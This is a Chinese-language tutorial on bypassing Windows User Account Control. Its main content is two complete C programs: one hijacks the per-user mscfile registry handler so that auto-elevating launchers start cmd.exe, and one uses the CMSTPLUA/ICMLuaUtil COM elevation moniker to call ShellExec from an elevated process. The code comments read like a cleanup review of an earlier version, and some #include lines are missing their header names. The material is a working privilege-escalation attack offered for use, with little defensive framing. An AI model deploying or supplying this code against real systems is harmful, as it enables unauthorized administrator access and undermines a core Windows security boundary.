有些系统程序在启动时会直接获得管理员权限而不触发 UAC 弹框，这类程序通常被称为“白名单程序”（更准确地说，是清单中带有 autoElevate=true、由微软签名且位于受信任目录下的自动提升程序）。例如 slui.exe、wusa.exe、taskmgr.exe、msra.exe、eudcedit.exe、eventvwr.exe、CompMgmtLauncher.exe 等。攻击者可以通过 DLL 劫持、注入或修改注册表来改变这些程序启动目标程序的方式，从而实现 Bypass UAC 提权。需要注意的是，自动提升只对管理员组成员的受限令牌生效，且 UAC 设置为“始终通知”时不会静默提升，因此这类绕过只在默认 UAC 级别下、当前用户属于管理员组时才有意义。
利用 CompMgmtLauncher.exe：该程序启动时会查询注册表项 HKCU\Software\Classes\mscfile\shell\open\command（.msc 后缀文件的默认打开方式）；如果该项存在，就会以管理员权限执行其中配置的程序。关键在于 HKCU\Software\Classes 对当前用户可写，并且在解析 HKCR 时优先于 HKLM\Software\Classes，因此无需任何特权即可劫持这个处理程序。另外，较新的 Windows 10 版本已对 eventvwr.exe/CompMgmtLauncher.exe 的这一 mscfile 劫持路径做了修复，实测前应先在目标系统版本上确认。
#include
#include
BOOL SetReg(char *);
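/*
 * Entry point: point the current user's mscfile handler at cmd.exe so that an
 * auto-elevating launcher (CompMgmtLauncher.exe / eventvwr.exe) starts it at
 * high integrity. This program only plants the registry value; launching the
 * auto-elevating binary afterwards is left to the operator.
 *
 * Returns 0 when the value was written, 1 otherwise (the original always
 * exited 0, even when SetReg failed).
 */
int main(void)
{
    char *path = "c:\\windows\\system32\\cmd.exe";

    /* SetReg reports failure through FALSE; surface it as the exit code so a
     * caller/script can tell whether the hijack was actually installed. */
    if (!SetReg(path)) {
        return 1;
    }
    return 0;
}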
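/*
 * Write lpszExePath as the default value of
 * HKCU\Software\Classes\mscfile\shell\open\command.
 *
 * HKCU\Software\Classes is writable by the current user and takes precedence
 * over HKLM when HKCR is resolved, which is why an unprivileged process can
 * redirect the handler that an auto-elevating launcher later runs.
 *
 * lpszExePath: NUL-terminated ANSI path of the program to run (not NULL).
 * Returns TRUE only when the key was created AND the value was written.
 * The original returned TRUE even when RegSetValueEx failed and ignored the
 * RegCreateKeyEx status entirely.
 *
 * Explicit "A" API variants are used because lpszExePath is a char string;
 * the generic names would switch to the wide versions under UNICODE and no
 * longer compile against this signature.
 *
 * The key is deliberately left in place (the launcher must find it); remove
 * it afterwards with RegDeleteKey to avoid leaving a persistent artifact.
 */
BOOL SetReg(char *lpszExePath)
{
    HKEY hKey = NULL;
    LONG status;
    DWORD cbData;

    if (lpszExePath == NULL) {
        return FALSE;
    }

    /* Least privilege: only KEY_SET_VALUE is needed on the returned handle;
     * the original asked for KEY_ALL_ACCESS. */
    status = RegCreateKeyExA(HKEY_CURRENT_USER,
                             "Software\\classes\\mscfile\\shell\\open\\command",
                             0, NULL, 0,
                             KEY_WOW64_64KEY | KEY_SET_VALUE,
                             NULL, &hKey, NULL);
    if (status != ERROR_SUCCESS || hKey == NULL) {
        return FALSE;
    }

    /* REG_SZ size is in bytes and must include the terminating NUL. */
    cbData = (DWORD)(lstrlenA(lpszExePath) + 1);
    status = RegSetValueExA(hKey, NULL, 0, REG_SZ,
                            (const BYTE *)lpszExePath, cbData);
    RegCloseKey(hKey);

    return (status == ERROR_SUCCESS) ? TRUE : FALSE;
}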
COM 提升名称（COM Elevation Moniker）技术允许运行在用户账户控制（UAC）下的应用程序以提升权限的方式激活 COM 类，前提是该类在注册表中被标记为允许提升（HKCR\CLSID\{...}\Elevation\Enabled = 1）。基于 ICMLuaUtil 接口的 Bypass UAC 正是利用这一机制：通过提升名称绑定 CMSTPLUA 类，得到一个运行在高完整性进程中的 ICMLuaUtil 接口，再调用其 ShellExec 方法创建指定进程，从而实现 Bypass UAC。需要注意，绑定过程是否会弹出同意提示取决于 UAC 对调用进程的判定；从任意普通进程直接调用时可能仍会弹框，实际利用通常要配合进程伪装等手段，请在目标系统上验证。
//bypassUac.cpp
#include
#include
#include "bypassUac.h"
BOOL CMLuaUtilBypassUAC(LPWSTR );
HRESULT CoCreateInstanceAsAdmin(HWND , REFCLSID , REFIID , PVOID *);
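/*
 * Entry point: launch cmd.exe through the elevated CMSTPLUA object.
 *
 * Returns 0 when CMLuaUtilBypassUAC reported success, 1 otherwise (the
 * original discarded the result and always exited 0).
 */
int main(void)
{
    LPWSTR path = L"c:\\windows\\system32\\cmd.exe";

    return CMLuaUtilBypassUAC(path) ? 0 : 1;
}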
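/*
 * Ask the elevated CMSTPLUA object to start lpwszExecutable via its
 * ShellExec method.
 *
 * Flow: parse the CLSID/IID strings, bind the class through the COM
 * elevation moniker (CoCreateInstanceAsAdmin), call ShellExec, Release.
 *
 * lpwszExecutable: wide path of the program to launch; must not be NULL.
 * Returns TRUE only when ShellExec itself reported success, FALSE on any
 * earlier failure (unchanged contract).
 *
 * Change vs. the original: CLSIDFromString/IIDFromString results are now
 * checked. A failed parse left both GUIDs zeroed and produced a confusing
 * error from CoGetObject further down instead of a clear early exit.
 *
 * NOTE(review): whether the bind completes without a consent prompt depends
 * on how the consent engine classifies the calling process; from an
 * arbitrary executable it may still prompt — verify on the target build.
 * The thread's COM initialisation done inside CoCreateInstanceAsAdmin is
 * never balanced with CoUninitialize; harmless for this short-lived process.
 */
BOOL CMLuaUtilBypassUAC(LPWSTR lpwszExecutable)
{
    CLSID clsid = { 0 };
    IID iid = { 0 };
    ICMLuaUtil *pLua = NULL;
    HRESULT hr;
    BOOL ok = FALSE;

    if (lpwszExecutable == NULL) {
        return FALSE;
    }

    hr = CLSIDFromString(CLSID_CMSTPLUA, &clsid);
    if (FAILED(hr)) {
        return FALSE;
    }
    hr = IIDFromString(IID_ICMLuaUtil, &iid);
    if (FAILED(hr)) {
        return FALSE;
    }

    /* Bind through "Elevation:Administrator!new:{CLSID}"; on success pLua is
     * a proxy to an object living in a high-integrity server process. */
    hr = CoCreateInstanceAsAdmin(NULL, clsid, iid, (PVOID *)&pLua);
    if (FAILED(hr) || pLua == NULL) {
        return FALSE;
    }

    /* ShellExec is vtable slot 9 (see ICMLuaUtilVtbl in bypassUac.h):
     * file, parameters, directory, fMask, nShow. */
    hr = pLua->lpVtbl->ShellExec(pLua, lpwszExecutable, NULL, NULL, 0, SW_SHOW);
    ok = SUCCEEDED(hr) ? TRUE : FALSE;

    pLua->lpVtbl->Release(pLua);
    return ok;
}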
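/*
 * Bind rclsid through the COM elevation moniker
 * ("Elevation:Administrator!new:{CLSID}") and return the requested interface
 * in *ppVoid.
 *
 * hWnd:   window passed as BIND_OPTS3.hwnd (owner for any elevation UI;
 *         may be NULL).
 * rclsid: class to activate.
 * riid:   interface to return.
 * ppVoid: receives the interface pointer on success; must not be NULL.
 * Returns the HRESULT of the first failing step, otherwise that of CoGetObject.
 *
 * Fixes vs. the original: wszCLSID and wszMonikerName hold MAX_PATH wide
 * characters, but STRSAFE_MAX_CCH (2^31-1) was passed as their size to
 * StringFromGUID2 and StringCchPrintfW, which disables the bounds check. The
 * true buffer sizes are passed now, the 0-on-failure result of
 * StringFromGUID2 is checked, and a failed CoInitialize is reported instead
 * of letting CoGetObject fail later with a less specific error.
 *
 * CoInitialize is intentionally not balanced with CoUninitialize here: the
 * proxy handed back in *ppVoid must remain usable after this call returns.
 */
HRESULT CoCreateInstanceAsAdmin(HWND hWnd, REFCLSID rclsid, REFIID riid, PVOID *ppVoid)
{
    WCHAR wszCLSID[MAX_PATH] = { 0 };
    WCHAR wszMonikerName[MAX_PATH] = { 0 };
    BIND_OPTS3 bo = { 0 };
    HRESULT hr;

    if (ppVoid == NULL) {
        return E_POINTER;
    }
    *ppVoid = NULL;

    /* S_FALSE (already initialised) is fine. RPC_E_CHANGED_MODE means the
     * thread is already in the other apartment model; the bind still works. */
    hr = CoInitialize(NULL);
    if (FAILED(hr) && hr != RPC_E_CHANGED_MODE) {
        return hr;
    }

    /* StringFromGUID2 returns the number of characters written, 0 on failure. */
    if (StringFromGUID2(rclsid, wszCLSID,
                        (int)(sizeof(wszCLSID) / sizeof(wszCLSID[0]))) == 0) {
        return E_FAIL;
    }

    hr = StringCchPrintfW(wszMonikerName,
                          sizeof(wszMonikerName) / sizeof(wszMonikerName[0]),
                          L"Elevation:Administrator!new:%s", wszCLSID);
    if (FAILED(hr)) {
        return hr;
    }

    bo.cbStruct = sizeof(bo);
    bo.hwnd = hWnd;
    bo.dwClassContext = CLSCTX_LOCAL_SERVER;

    return CoGetObject(wszMonikerName, &bo, riid, ppVoid);
}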
//bypassUac.h
#ifndef _BYPASS_UAC_H_
#define _BYPASS_UAC_H_
#include
#include
#include
/* CLSID of the auto-elevating CMSTPLUA COM class and IID of its ICMLuaUtil interface */
#define CLSID_CMSTPLUA L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
#define IID_ICMLuaUtil L"{6EDD6D74-C007-4E75-B76A-E5740995E24C}"
/* Hand-built ICMLuaUtil vtable; ShellExec is the method used for the bypass */
typedef interface ICMLuaUtil ICMLuaUtil;
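/*
 * Hand-built vtable layout for ICMLuaUtil (no public header or IDL ships
 * for this interface).
 *
 * Only two slots are used by name: ShellExec (index 9) and
 * SetRegistryStringValue (index 10). The MethodN entries are placeholders
 * whose sole purpose is to keep those two at the correct offset. Adding or
 * removing a placeholder shifts every later slot and would dispatch to the
 * wrong method inside the elevated server, so the order is part of the
 * contract.
 *
 * Change vs. the original: the remaining string parameters of ShellExec and
 * SetRegistryStringValue are LPCWSTR, matching lpFile, which was already
 * LPCWSTR. LPCTSTR would silently become `const char *` in a non-UNICODE
 * build while the call site passes wide strings.
 */
typedef struct ICMLuaUtilVtbl {
    BEGIN_INTERFACE

    /* IUnknown: slots 0-2 */
    HRESULT (STDMETHODCALLTYPE *QueryInterface)(
        __RPC__in ICMLuaUtil *This,
        __RPC__in REFIID riid,
        void **ppvObject);
    ULONG (STDMETHODCALLTYPE *AddRef)(
        __RPC__in ICMLuaUtil *This);
    ULONG (STDMETHODCALLTYPE *Release)(
        __RPC__in ICMLuaUtil *This);

    /* Slots 3-8: unused placeholders, never called from this code. */
    HRESULT (STDMETHODCALLTYPE *Method1)(__RPC__in ICMLuaUtil *This);
    HRESULT (STDMETHODCALLTYPE *Method2)(__RPC__in ICMLuaUtil *This);
    HRESULT (STDMETHODCALLTYPE *Method3)(__RPC__in ICMLuaUtil *This);
    HRESULT (STDMETHODCALLTYPE *Method4)(__RPC__in ICMLuaUtil *This);
    HRESULT (STDMETHODCALLTYPE *Method5)(__RPC__in ICMLuaUtil *This);
    HRESULT (STDMETHODCALLTYPE *Method6)(__RPC__in ICMLuaUtil *This);

    /* Slot 9: launch lpFile (with optional parameters/working directory)
     * from the elevated server; fMask/nShow as for ShellExecuteEx. */
    HRESULT (STDMETHODCALLTYPE *ShellExec)(
        __RPC__in ICMLuaUtil *This,
        _In_ LPCWSTR lpFile,
        _In_opt_ LPCWSTR lpParameters,
        _In_opt_ LPCWSTR lpDirectory,
        _In_ ULONG fMask,
        _In_ ULONG nShow);

    /* Slot 10: write a string value from the elevated server. */
    HRESULT (STDMETHODCALLTYPE *SetRegistryStringValue)(
        __RPC__in ICMLuaUtil *This,
        _In_ HKEY hKey,
        _In_opt_ LPCWSTR lpSubKey,
        _In_opt_ LPCWSTR lpValueName,
        _In_ LPCWSTR lpValueString);

    /* Slots 11-22: unused placeholders. */
    HRESULT (STDMETHODCALLTYPE *Method9)(__RPC__in ICMLuaUtil *This);
    HRESULT (STDMETHODCALLTYPE *Method10)(__RPC__in ICMLuaUtil *This);
    HRESULT (STDMETHODCALLTYPE *Method11)(__RPC__in ICMLuaUtil *This);
    HRESULT (STDMETHODCALLTYPE *Method12)(__RPC__in ICMLuaUtil *This);
    HRESULT (STDMETHODCALLTYPE *Method13)(__RPC__in ICMLuaUtil *This);
    HRESULT (STDMETHODCALLTYPE *Method14)(__RPC__in ICMLuaUtil *This);
    HRESULT (STDMETHODCALLTYPE *Method15)(__RPC__in ICMLuaUtil *This);
    HRESULT (STDMETHODCALLTYPE *Method16)(__RPC__in ICMLuaUtil *This);
    HRESULT (STDMETHODCALLTYPE *Method17)(__RPC__in ICMLuaUtil *This);
    HRESULT (STDMETHODCALLTYPE *Method18)(__RPC__in ICMLuaUtil *This);
    HRESULT (STDMETHODCALLTYPE *Method19)(__RPC__in ICMLuaUtil *This);
    HRESULT (STDMETHODCALLTYPE *Method20)(__RPC__in ICMLuaUtil *This);

    END_INTERFACE
} *PICMLuaUtilVtbl;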
/* The COM object as seen from C-style code: a single pointer to the vtable
 * declared above. Every method call goes through lpVtbl->Method(This, ...).
 * (`interface` is just a macro for `struct` in the Windows headers.) */
struct ICMLuaUtil
{
    CONST_VTBL struct ICMLuaUtilVtbl *lpVtbl;
};
HRESULT CoCreateInstanceAsAdmin(HWND hWnd, REFCLSID rclsid, REFIID riid, PVOID *ppVoid);
BOOL CMLuaUtilBypassUAC(LPWSTR lpwszExecutable);
#endif